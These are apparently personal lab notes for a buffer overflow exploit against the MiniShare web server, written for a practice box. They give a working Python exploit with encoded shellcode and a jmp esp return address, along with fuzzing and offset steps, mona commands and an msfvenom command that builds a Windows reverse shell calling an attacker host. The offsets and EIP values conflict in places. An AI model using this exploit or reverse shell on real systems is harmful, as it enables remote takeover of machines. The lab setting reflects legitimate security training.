fuzz code send create a pattern get the EIP : EIP is overwritten with " 36684335 "
[email protected]:~/attacker-framework/htb/minishare# /usr/share/metasploit-framework/tools/exploit/pattern_off set.rb -q 36684335 [*] Exact match at offset 1787


import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"1787 buff+="\x4a\x75\xd7\x77" #address of jmp esp statement form user32.dll buff+="\x90"20 #20 NOPs are added buff+=("\xdb\xde\xbd\x74\xf9\x07\x95\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x53\x83\xc0\x04\x31\x68\x13\x03\x1c\xea\xe5\x60\x20\xe4\x68" "\x8a\xd8\xf5\x0c\x02\x3d\xc4\x0c\x70\x36\x77\xbd\xf2\x1a\x74" "\x36\x56\x8e\x0f\x3a\x7f\xa1\xb8\xf1\x59\x8c\x39\xa9\x9a\x8f" "\xb9\xb0\xce\x6f\x83\x7a\x03\x6e\xc4\x67\xee\x22\x9d\xec\x5d" "\xd2\xaa\xb9\x5d\x59\xe0\x2c\xe6\xbe\xb1\x4f\xc7\x11\xc9\x09" "\xc7\x90\x1e\x22\x4e\x8a\x43\x0f\x18\x21\xb7\xfb\x9b\xe3\x89" "\x04\x37\xca\x25\xf7\x49\x0b\x81\xe8\x3f\x65\xf1\x95\x47\xb2" "\x8b\x41\xcd\x20\x2b\x01\x75\x8c\xcd\xc6\xe0\x47\xc1\xa3\x67" "\x0f\xc6\x32\xab\x24\xf2\xbf\x4a\xea\x72\xfb\x68\x2e\xde\x5f" "\x10\x77\xba\x0e\x2d\x67\x65\xee\x8b\xec\x88\xfb\xa1\xaf\xc4" "\xc8\x8b\x4f\x15\x47\x9b\x3c\x27\xc8\x37\xaa\x0b\x81\x91\x2d" "\x6b\xb8\x66\xa1\x92\x43\x97\xe8\x50\x17\xc7\x82\x71\x18\x8c" "\x52\x7d\xcd\x39\x5a\xd8\xbe\x5f\xa7\x9a\x6e\xe0\x07\x73\x65" "\xef\x78\x63\x86\x25\x11\x0c\x7b\xc6\x0c\x91\xf2\x20\x44\x39" "\x53\xfa\xf0\xfb\x80\x33\x67\x03\xe3\x6b\x0f\x4c\xe5\xac\x30" "\x4d\x23\x9b\xa6\xc6\x20\x1f\xd7\xd8\x6c\x37\x80\x4f\xfa\xd6" "\xe3\xee\xfb\xf2\x93\x93\x6e\x99\x63\xdd\x92\x36\x34\x8a\x65" "\x4f\xd0\x26\xdf\xf9\xc6\xba\xb9\xc2\x42\x61\x7a\xcc\x4b\xe4" "\xc6\xea\x5b\x30\xc6\xb6\x0f\xec\x91\x60\xf9\x4a\x48\xc3\x53" "\x05\x27\x8d\x33\xd0\x0b\x0e\x45\xdd\x41\xf8\xa9\x6c\x3c\xbd" "\xd6\x41\xa8\x49\xaf\xbf\x48\xb5\x7a\x04\x78\xfc\x26\x2d\x11" "\x59\xb3\x6f\x7c\x5a\x6e\xb3\x79\xd9\x9a\x4c\x7e\xc1\xef\x49" "\x3a\x45\x1c\x20\x53\x20\x22\x97\x54\x61")
buff+=" HTTP/1.1\r\n\r\n" s.send(buff) s.close()
Run the minishare server in the windows machine -> fuzz the application to crash -> we found it crashed in 2000 bytes -> then we need to check the offset -> actual value ->
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000 -> create a pattern -> then run the code in to python -> then we found the EIp value -> 43366843 -> now need to check the offset -> /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 43366843 -> pattern value we got 1788 -> now run the code with this offset code and check the application is crashed or not -> after crashing we need to check the bad character -> remove the bad character -> ESP Follow dump -> after got bad character \x00\x0d-> we need jmp esp value -> we will use mona module for this -> !mona modules -> check the DEP and ASLR False -> then pick this otherwise use mona command -> !mona find -s "\xff\xe4" -m user32.dll -> pick 1st one and reverse it ->7603B503 # Address retrieved from Mona results -> \x03\xB5\x03\x76 # How it looks in your final exploit -> now create a shell code -> msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp LHOST=ip LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00\x0d’ -f python -> add shell code in to python code and maintain the buffere value -> buffer+="A" * 1788 + "\x03\xB5\x03\x76" + "C" * 16 + buf -> run it -> boom